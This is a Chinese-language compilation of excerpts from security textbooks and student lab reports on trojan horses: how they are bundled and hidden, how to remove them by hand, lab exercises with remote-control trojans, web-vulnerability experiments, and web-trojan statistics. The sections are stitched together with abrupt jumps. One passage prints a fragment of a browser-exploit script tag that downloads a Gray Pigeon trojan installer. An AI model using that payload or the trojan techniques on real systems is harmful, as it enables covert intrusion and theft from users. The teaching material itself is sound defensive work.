下载文档原格式
目录第一章引言 (1)第二章木马概述 (1)2.1木马的定义及特点 (1)2.2木马的工作原理 (2)2.3木马的分类.................................................... 第三章常见的木马攻击手段3.1捆绑方式.....................................................3.2邮件和QQ冒名欺骗............................................3.3网页木马方式.................................................3.4伪装成其他文件...............................................第四章木马的防范措施4.1安装个人防火墙、木马查杀软件和及时安装系统补丁...............4.2隐藏IP和关闭不必要的端口....................................4.3使用虚拟计算机...............................................4.4关闭不必要的服务选项.........................................4.5定期检查电脑的启动项.........................................4.6不要随意打开邮件.............................................4.7谨慎下载和安装第三方软件.....................................第五章总结........................................................参考文献...........................................................第一章引言随着计算机的日益普及,人们对于“木马”一词已不陌生。
木马捆绑与隐藏12.2.1 背景描述木马并不是合法的网络服务程序,如果单纯以本来面目出现,很容易被网络用户识别。
为了不被别人发现,木马制造者必须想方设法改换面貌;为了诱使网络用户下载并执行它,黑客将木马程序混合在合法的程序里面,潜入用户主机。
在受害主机里,为了逃避杀毒软件的查杀,木马也会将自己“乔装打扮”;为了防止用户将其从系统里揪出来,木马则采取一切可能的手法进行隐藏自己。
总之,现在的木马制造者是越来越狡猾,他们常用文件捆绑的方法,将木马捆绑到图像、纯文本等常见的文件中,然后通过网页、QQ、Email 或MSN 等将这些文件传送给受害者,而用户一旦不慎打开这些文件,木马就自动执行了,主机就中木马了。
12.2.2 工作原理1.木马捆绑木马捆绑即是文件捆绑,黑客将木马或者病毒等恶意程序与其它正常文件组合成的一个整体。
这是一种最简单也是最可行和最常用的一种方法,当受害者下载并运行捆绑了木马等恶意程序的文件时,其中的木马等恶意程序就会被激活。
木马捆绑的手段归纳起来共有四种:(1)利用捆绑机软件和文件合并软件捆绑木马;(2)利用WINRAR、WINZIP 等软件制作自解压捆绑木马;(3)利用软件打包软件制作捆绑木马;(4)利用多媒体影音文件传播。
2.木马隐藏隐藏是一切恶意程序生存之本。
以下是木马的几种隐藏手段:(1)进程隐蔽:伪隐藏,就是指程序的进程仍然存在,只不过是让它消失在进程列表里。
真隐藏则是让程序彻底的消失,不以一个进程或者服务的方式工作,做为一个线程,一个其他应用程序的线程,把自身注入其他应用程序的地址空间。
(2)伪装成图像文件:即将木马图标修改成图像文件图标。
(3)伪装成应用程序扩展组件:将木马程序写成任何类型的文件(如dll,ocx等),然后挂在十分出名的软件中。
因为人们一般不怀疑这些软件。
(4)错觉欺骗:利用人的错觉,例如故意混淆文件名中的1(数字)与l(L的小写)、0(数字)与o(字母)或O(字母)。
实验网络木马手工查杀(一)【实验目的】掌握dos或安全模式下的查杀木马病毒的方法【实验原理】注:请在虚拟机中做杀毒实训。
3.实验步骤:一、把老师给你的木马程序,放入操作系统中。
注:双击病毒之前,请用netstat /ano查看一下端口二、双击其中一个csgame.exe程序。
三、查找生成的程序在电脑的哪些地方,并查看其开放的端口;Netstat /ano 看异常端口,再看对应的进程号(记得进行比校)Tasklist 根据上面的进程号,找到这个进程名四、利用已学的方法,在安全模式下手工查杀该病毒程序请杀死该进程ntsd /c q /p 进程号或者用taskkill /im 进程名;五、在所有盘上查找那个进程名,然后删除之,并记住它的生成日期时间,再到所有盘上查找同一日期时间生成的文件,那些就一定是病毒的副本或“尾巴”,再将其删除。
六、再到注册表中,查找所有的病毒母体文件和副本,并删除之;若是附在正常的注册表键值路径下,只要删除病毒文件。
进注册表的方法:“运行”中输入regedit,即可进入。
七、最后再进入“启动”项,在“运行”中输入msconfig,即可进入。
在“启动“项中,查找一下,是否有病毒文件,若有的话,请将左的的勾去掉。
八、最后检测该病毒是否已查杀干净,若干净重启机器,其端口就不见了。
若刚才的病毒在正常模式或者安全模式下,不能删除,请住病毒在那些盘中及它的路径,再到纯DOS下,用DOS删除之。
一般要用到的DOS命令如下:DirCdRdDelDeleteAttribXcopyCopy注:以上操作步骤,须详细的操作步骤和文字说明并截图。
病毒实验报告——木马程序设计姓名:潘莹学号:U200915340 班级:信息安全0903班日期:2012.01.10目录木马原理 (3)实验目的 (9)实验设计 (9)实现的功能 (9)各个功能陈述 (10)实验模块 (11)socket编程 (11)隐藏技术——服务级木马 (13)钩子技术 (14)进程查杀 (15)实验详细设计 (15)实验截屏 (16)心得体会 (18)附录 (18)附录一木马程序源代码 (18)附录二钩子源代码 (37)附录三参考书籍 (45)木马原理一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。
(1)硬件部分:建立木马连接所必须的硬件实体。
控制端:对服务端进行远程控制的一方。
服务端:被控制端远程控制的一方。
INTERNET:控制端对服务端进行远程控制,数据传输的网络载体。
(2)软件部分:实现远程控制所必须的软件程序。
控制端程序:控制端用以远程控制服务端的程序。
木马程序:潜入服务端内部,获取其操作权限的程序。
木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。
(3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。
控制端IP,服务端IP:即控制端,服务端的网络地址,也是木马进行数据传输的目的地。
控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马程序。
木马原理用木马这种黑客工具进行网络入侵,从过程上看大致可分为六步,下面我们就按这六步来详细阐述木马的攻击原理。
一.配置木马一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现以下两方面功能:(1) 木马伪装:木马配置程序为了在服务端尽可能的好的隐藏木马,会采用多种伪装手段,如修改图标,捆绑文件,定制端口,自我销毁等,我们将在“传播木马”这一节中详细介绍。
(2) 信息反馈:木马配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址,IRC号,ICO号等等,具体的我们将在“信息反馈”这一节中详细介绍。
web漏洞实验报告Web漏洞实验报告概述:Web漏洞是指存在于Web应用程序中的安全弱点,黑客可以利用这些漏洞来获取未经授权的访问、窃取敏感信息或破坏系统。
为了更好地了解Web漏洞的类型和影响,我们进行了一系列的实验。
实验一:SQL注入漏洞SQL注入漏洞是最常见的Web漏洞之一。
通过在用户输入的数据中插入恶意SQL代码,黑客可以绕过应用程序的验证机制,获取数据库中的敏感信息。
我们在实验中使用了一个简单的登录页面作为目标,通过输入特定的SQL语句,我们成功绕过了登录验证,并获取了数据库中的用户信息。
这个实验让我们深刻认识到了SQL注入漏洞的危害性,并意识到了在开发过程中应该对用户输入进行严格的验证和过滤。
实验二:跨站脚本攻击(XSS)XSS是另一种常见的Web漏洞,黑客可以通过在网页中插入恶意脚本来获取用户的敏感信息或控制用户的浏览器。
我们在实验中构建了一个简单的留言板应用,通过在留言内容中插入恶意脚本,我们成功地获取了其他用户的Cookie信息。
这个实验让我们认识到了XSS漏洞的危害性,以及在开发过程中应该对用户输入进行适当的过滤和转义。
实验三:文件上传漏洞文件上传漏洞是指应用程序未对用户上传的文件进行充分的验证和过滤,导致黑客可以上传恶意文件并在服务器上执行任意代码。
我们在实验中构建了一个文件上传功能,并成功地上传了一个包含恶意代码的文件。
这个实验让我们意识到了文件上传漏洞的危险性,并明白了在开发过程中应该对用户上传的文件进行严格的验证和限制。
实验四:跨站请求伪造(CSRF)CSRF是一种利用用户身份验证信息来执行未经授权操作的攻击方式。
我们在实验中构建了一个简单的转账功能,并成功地利用了CSRF漏洞来执行未经授权的转账操作。
这个实验让我们认识到了CSRF漏洞的危害性,并明白了在开发过程中应该对用户的操作进行适当的验证和防范。
实验五:命令注入漏洞命令注入漏洞是指应用程序未对用户输入的命令进行充分的验证和过滤,导致黑客可以执行任意系统命令。
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。
这是我一黑客朋友给我说的一句说。
打开该网站的首页,经检查,我确实中了灰鸽子。
怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。
很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace"src="/1.exe"></SCRIPT>小提示:代码说明a. 代码中“src”的属性为程序的网络地址,本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
实验指导5 木马攻击与防范实验1.实验目的理解和掌握木马传播和运行的机制,掌握检查和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
2.预备知识木马及木马技术的介绍(1)木马概念介绍很多人把木马看得很神秘,其实,木马就是在用户不知道的情况下被植入用户计算机,用来获取用户计算机上敏感信息(如用户口令,个人隐私等)或使攻击者可以远程控制用户主机的一个客户服务程序。
这种客户/服务模式的原理是一台主机提供服务(服务器),另一台主机使用服务(客户机)。
作为服务器的主机一般会打开一个默认的端口并进行监听(Listen),如果有客户机向服务器的这一端口提出连接请求(Connect Request),服务器上的相应守护进程就会自动运行,来应答客户机的请求。
通常来说,被控制端相当于一台服务器,控制端则相当于一台客户机,被控制端为控制端提供预定的服务。
(2)木马的反弹端口技术由于防火墙对于进入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。
于是,与一般的木马相反,反弹端口型木马的服务端 (被控制端)使用主动端口,客户端 (控制端)使用被动端口。
木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口;为了隐蔽起见,控制端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似TCP UserIP:1026 ControllerIP:80 ESTABLISHED 的情况,稍微疏忽一点,你就会以为是自己在浏览网页。
(3)线程插入技术木马程序的攻击性有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等。
这样木马的攻击性和隐藏性就大大增强了。
木马攻击原理特洛伊木马是一个程序,它驻留在目标计算机里,可以随计算机自动启动并在某一端口进行侦听,在对接收的数据识别后,对目标计算机执行特定的操作。
实验一木马病毒专业班级学号姓名实验学时实验类型实验地点实验时间指导老师实验成绩年月日一实验目的掌握木马病毒的基本原理。
二实验原理用木马程序进行网络入侵,从过程上看大致可分为六步:配置木马(实现伪装和信息反馈)、传播木马(通过 E.mail、病毒和软件等)、运行木马、信息获取、建立连接和远程控制(实现对受害者的控制)。
三预备知识首先要选择熟悉的编程工具,本实验选用VC++为编程语言。
以CSocket 为基类生成进行服务器和控制端的通信,因此需要了解基于Socket 的编程原理。
四实验内容实验内容主要包括程序编译、程序演示两个部分。
(1)程序编译在VC++6.0 环境下编译客户端和服务器端程序。
(2)程序演示首先启动服务器端(被控制端),然后启动客户端(控制端),在控制端输入命令来控制被控制端。
本实验支持的命令参考表 4.1。
试验程序支持的命令列表命令命令含义CMD 执行应用程序!SHUT 退出木马FILEGET 获得远端文件EDTTCONF 编辑配置文件LIST 列目录VIEW 查看文件内容CDOPEN 关CDCDCLOSE 开CDREBOOT 重启计算机五实验环境● VMWar e 5.5.3● Windows XP 操作系统● Visual Studio 6.0 编程环境实验素材:experiments 目录下的simplehorse 目录。
虚拟机:virtualmachine 目录下的WinXPVM 目录。
六实验步骤复制实验文件到实验的计算机上。
其中,SocketListener 目录下是木马Server 端源代码,SocketCommand 目录下是木马Client 端源代码。
程序源代码在虚拟机的“D:\experiment\simplehorse”目录下。
用Visual Studio 6.0 环境分别编译这两部分代码编译。
生成的SocketListener.exe 应用程序时木马被控制端,SocketCommand.exe 应用程序是启动了木马的控制端。
网络安全实验报告冰河木马实验实验目的:1.了解冰河木马的原理和特点;2.掌握冰河木马部署的方法以及检测与防御手段。
实验器材:1. 安装有Windows操作系统的虚拟机;2.冰河木马部署工具。
实验步骤:1.安装虚拟机:根据实验需要,选择合适的虚拟机软件,并安装Windows操作系统。
2.配置网络环境:将虚拟机的网络模式设置为桥接模式,使其可以直接连入局域网。
4.部署冰河木马:a)打开解压后的冰河木马部署工具;b)输入冰河木马的监听端口号;c)选择合适的木马文件类型并输入要部署的木马文件名;d)点击部署按钮,等待部署完成。
5.运行冰河木马:a)在虚拟机上运行冰河木马;b)冰河木马将开始监听指定的端口。
6.外部操作:a)在外部主机上打开浏览器,输入虚拟机IP地址和冰河木马监听端口号;实验原理:冰河木马是一种隐蔽性极高的网络攻击工具,其中”冰河”是指冰山一角,表示用户常用的木马查杀工具只能发现一小部分木马样本,而多数都无法查杀。
它通过监听指定端口,接收外部指令,并将得到的内容通过HTTP协议加密封装成HTTP请求发送给指定服务器。
可以通过浏览器的方式来控制远程主机。
实验总结:本次实验中,我通过部署和运行冰河木马对实验环境进行了攻击模拟。
冰河木马以其良好的隐蔽性和强大的功能,使得安全防护变得更加困难。
冰河木马能够对目标计算机进行文件传输、进程控制等操作,使得攻击者可以远程控制受害机器,对其进行攻击、窃取敏感信息等。
为了提高网络安全,我们需要采取以下防御措施:1.及时更新系统和应用程序的补丁,修复可能存在的安全漏洞;2.安装并定期更新杀毒软件和防火墙,提高恶意程序的检测和防范能力;3.加强网络安全意识教育,防止员工被钓鱼、诈骗等方式获取重要信息;4.强化网络审计和监控,及时发现并处置网络攻击行为;5.配置安全策略,限制外部访问和流量。
通过本次实验,我对冰河木马的工作原理有了一定的认识,并学会了一些基本的防御手段,这对我今后从事网络安全工作有着重要的意义。
特洛伊木马特洛伊木马(Trojan Horse)又称木马,是一种通过各种方法直接或者间接与远程计算机之间建立起连接,使远程计算机能够通过网络控制本地计算机的程序。
这个名称来源于希腊神话《木马屠城记》。
古希腊有大军围攻特洛伊城,久久无法攻下。
于是有人献计制造一只高二丈的大木马,假装作战马神,让士兵藏匿于巨大的木马中,大部队假装撤退而将木马摈弃于特洛伊城下。
城中得知解围的消息后,遂将“木马”作为奇异的战利品拖入城内,全城饮酒狂欢。
到午夜时分,全城军民尽入梦乡,匿于木马中的将士开秘门游绳而下,开启城门及四处纵火,城外伏兵涌入,部队里应外合,焚屠特洛伊城。
后世称这只大木马为“特洛伊木马”。
如今黑客程序借用其名,有“一经潜入,后患无穷”之意。
通常木马并不被当成病毒,因为它们通常不包括感染程序,因而并不自我复制,只是靠欺骗获得传播。
现在,随着网络的普及,木马程序的危害变得十分强大,概括起来,木马的危害有:窃取数据、接受非授权操作者的指令、篡改文件和数据、删除文件和数据、施放病毒、使系统自毁、远程运行程序、跟踪监视对方屏幕、直接屏幕鼠标控制,键盘输入控制、监视对方任务且可以中止对方任务、锁定鼠标键盘和屏幕、远程重启和关机、远程读取和修改注册表、共享被控制端的硬盘等。
远程控制概述。
要了解木马,首先应了解远程控制。
所谓远程控制,是指管理人员在异地通过计算机网络异地拨号或双方都接入Internet等手段,联通需被控制的计算机,将被控计算机的桌面环境显示到自己的计算机上,通过本地计算机对远方计算机进行配置、软件安装程序、修改等工作。
这里的远程不是字面意思的远距离,一般指通过网络控制远端电脑。
早期的远程控制往往指在局域网中的远程控制而言,随着互联网的普及和技术革新,现在的远程控制往往指互联网中的远程控制。
当操作者使用主控端电脑控制被控端电脑时,就如同坐在被控端电脑的屏幕前一样,可以启动被控端电脑的应用程序,可以使用或窃取被控端电脑的文件资料,甚至可以利用被控端电脑的外部打印设备(打印机)和通信设备(调制解调器或者专线等)来进行打印和访问外网和内网,就像利用遥控器遥控电视的音量、变换频道或者开关电视机一样。
不过,有一个概念需要明确,那就是主控端电脑只是将键盘和鼠标的指令传送给远程电脑,同时将被控端电脑的屏幕画面通过通信线路回传过来。
也就是说,控制被控端电脑进行操作似乎是在眼前的电脑上进行的,实质是在远程的电脑中实现的,不论打开文件,还是上网浏览、下载等都是存储在远程的被控端电脑中的。
远程控制必须通过网络才能进行。
位于本地的计算机是操纵指令的发出端,称为主控端或客户端,非本地的被控计算机叫做被控端或服务器端。
“远程”不等同于远距离,主控端和被控端可以是位于同一局域网的同一房间中,也可以是连入Internet的处在任何位置的两台或多台计算机。
远程控制软件一般分客户端程序(Client)和服务器端程序(Server)两部分,通常将客户端程序安装到主控端的电脑上,将服务器端程序安装到被控端的电脑上。
使用时客户端程序向被控端电脑中的服务器端程序发出信号,建立一个特殊的远程服务,然后通过这个远程服务,使用各种远程控制功能发送远程控制命令,控制被控端电脑中的各种应用程序运行。
远程控制并不神秘,Windows XP系统中就提供了多种简单的远程控制手段,如远程桌面连接。
目前市场上有很多远程控制软件,如PCAnywhere就是一款功能强大的远程控制软件。
PCAnywhere是由赛门铁克(Symantec)公司出品的远程控制软件,它功能强大,几乎支持所有的网络连接方式与网络协议,利用PCAnywhere,计算机管理人员可以轻松地实现在本地计算机上控制远程计算机,使得两地的计算机可以协同工作。
在实现远程控制的同时,PCAnywhere 还拥有更为完善的安全策略与密码验证机制,从而保证了远程被控主机的安全。
远程控制虽然可以方便地操纵远程计算机,但它也可能给远程计算机带来安全隐患。
因为远程计算机一旦成为服务端后,其他人只要知道了这台计算机的IP地址和服务端口,就可以对其控制,带来安全隐患。
黑客正是利用了远程控制软件的这种特点,设计了木马程序。
其实木马程序的工作原理和远程控制软件是一样的,木马就是一种基于远程控制技术的黑客工具,只是它具有破坏性、隐藏性和非传播性等特点而异。
木马程序一般也是由两部分组成,分别是服务器端和客户端。
服务器端程序指的是运行在被控制的电脑的木马程序,该程序为.exe后缀的可执行文件。
客户端程序安装在控制端,客户端能够对服务器端的控制。
在Windows系统中,木马一般作为一个网络服务程序在中了木马的计算机后台运行,监听本机一些特定端口,这个端口号多数比较大(5000以上,但也有少数是5000以下的)。
当该木马相应的客户端程序在此端口上请求连接时,它会与客户程序建立TCP连接,从而被客户端远程控制。
木马和常规远程控制软件的相同点:1.常规远程控制软件和木马都是用一个客户端通过网络来控制服务端,控制端可以是WEB,也可以是手机,或者电脑,可以说控制端植入哪里,哪里就可以成为客户端,服务端也同样如此;2.常规远程控制软件和木马都可以进行远程资源管理,比如文件上传下载修改;3.常规远程控制软件和木马都可以进行远程屏幕监控,键盘记录,进程和窕口查看ဂ木马和常规远程控制软件的区别:1.木马有破坏性:比如DDOS攻击、下载者功能、格式化硬盘、肉鸡和代理功能;2.木马有隐蔽性:木马最戾著的特征就是隐蔽性,也就是服务端是隐藏的,并不在被控者桌面显示,不被被控者察觉,这样一来无疑增加了木马的危害性,也为木马窃取密码提供了方便之门。
远程控制和木马在功能上非常相似,木马可以理解为加了恶意功能的远程控制软件。
木马的分类。
根据木马程序的具体功能,可以分为五类:1.远程访问型木马。
远程访问型木马是现在最广泛的特洛伊木马。
这种木马起着远程控制的功能,用起来非常简单,只需先运行服务端程序,同时获得远程主机的IP地址,控制者就能任意访问被控制端的计算机。
这种木马可以使远程控制者在本地机器上做任何事情,比如键盘记录、上传和下载功能、发送一个“截取屏幕”等等。
这种类型的木马有著名的BO (Back Office)和国产的冰河等。
2.密码发送型木马。
密码发送型木马的目的是找到所有的隐藏密码,并且在受害者不知道的情况下把它们发送到指定的信箱。
大多数这类木马程序不会在每次系统重启时都自动加载,它们大多数使用25号端口发送电子邮件。
3.键盘记录型木马。
键盘记录型木马非常简单的,它只做一种事情,就是记录受害者的键盘敲击,并且在Log文件里做完整的记录。
这种木马程序随着系统的启动而启动,知道受害者在线并记录每一个用户事件,然后通过邮件或其他方式发送给控制者。
4.破坏型木马:大部分木马程序只窃取信息,不做破坏性的事件,但破坏型木马却以毁坏并且删除文件为目的。
它们可以自动删除受控计算机上所有的.ini.exe文件,甚至格式化受害者的硬盘,系统中的信息会在顷刻间“灰飞烟灭”。
5.FTP型木马:FTP 型木马打开被控制计算机的21号端口,使任何人无需密码就可以用一个FTP客户端程序连接到受控制端计算机,并且可以进行最高权限的上传和下载,窃取受害者的机密文件。
根据木马的网络连接方向,可以分为两类:1.正向连接型:发起通信的方向为控制端向被控制端发起,这是传统技术,其缺点是不能透过防火墙。
2.反向连接型:发起通信的方向为被控制端向控制端发起,其出现主要是为了解决从内向外不能发起连接的情况的通信要求,已经被较新的木马广泛采用。
黑客要控制远程计算机,必须先将木马程序的服务端程序植入远程计算机中。
目前黑客一般通过如下几种方式进行传播:1.通过E-Mail附件传播;2.通过网页传播;3.通过文件传输;4.通过系统漏洞直接种植。
12.1 网页木马12.1.1 背景描述随着信息技术的不断发展,互联网网站已经成为信息传播、流通、交换及存储的重要手段,但是由于承载网站的应用程序具有自身无法完全克服的漏洞问题,为黑客的入侵提供了可乘之机。
利用网站漏洞,尤其是WEB 应用程序漏洞:如 SQL 注入等,黑客能够得到 Web 服务器的控制权限,随意篡改网页内容或窃取重要内部数据,更为严重的则是在网页中植入恶意代码,既“网页挂马”。
通过这一行为,黑客可以控制网站的访问者甚至包括网站本单位的人员的计算机,从而实现盗取银行帐号、内部机密信息等各种不可告人的目的。
由于网页木马制作的简单性和网络漏洞存在的必然性,通过网站漏洞进行网页挂马已经成为当前最流行的网站攻击方法和最受黑客青睐的木马散播方式。
超级巡警团队、数据安全实验室(DSWLAB)等相关部门汇总数据表明:2008年上半年,网页木马急骤增长,专业化、团队式的木马制造者,在攫取巨额非法利益的同时,给广大网民的正常工作学习带来了很大的不便,使网友们的利益受到了极大的损失。
巨额利润、Web 应用程序漏洞、社会工程学成为2008年上半年的网页木马增长的主要条件。
很多流行病毒(如:机器狗、磁碟机、游戏盗号病毒等)除了利用程序自身的传播机制进行传播外,也都会利用各种网页木马来扩大其破坏范围。
图12-1-1网马增长曲线图从图12-1-1中可以看出,短短十周的时间内国内网络上的网页木马竟达到了10多倍的增长。
由于一个网页木马对应着成百上千的,甚至是数以万计的计算机网络用户,所以通过网页木马被感染的计算机是放射性增长的。
超级巡警团队监控数据显示,在抽样调查所统计的时间内,被感染的网页数量达到1449034,几乎是平均每个网民每天至少会浏览到一个恶意链接。
被感染的网页增长走势如下图12-1-2:图12-1-2被感染网页增长曲线图根据瑞星“云安全”数据中心的统计数据(见图12-1-3和图12-1-4)表明,2009年上半年,瑞星“云安全”系统拦截到的挂马网页数累计达2.9亿个,共有11.2亿人次网民遭木马攻击,平均每天有622万余人次网民访问挂马网站;其中大型网站、流行软件被挂马的有35万个(以域名计算)。
网民被挂马网站攻击成功时使用的软件,主要是各种浏览器,以及内嵌了网页的流行软件。
根据以上瑞星公司的统计研究表明,目前的互联网非常脆弱,各种热点新闻、流行软件、社交(SNS)网站、浏览器插件的漏洞层出不穷,为黑客提供了大量入侵和攻击的机会。
网页取代网络成为攻击活动的主要渠道,“挂马网页”已经成为黑客传播病毒的主要手段。
目前90%以上的木马病毒通过“挂马”方式传播,这些几乎都源于系统漏洞、后台服务器存在不安全设置、网站实现代码缺陷(如SQL注入、论坛代码缺陷、跨站脚本等)、或网站提供Web服务的程序漏洞、IIS漏洞、Apache漏洞等隐患,给黑客可乘之机;其中访问量越大的网站越有被挂马的可能,因为此类网站被黑客关注程度较高;另外就是政府机关网站、各大中型企业网站,由于专业性技术人员缺乏,网站大多由第三方公司外包开发,存在缺陷较多,也最容易被挂马。
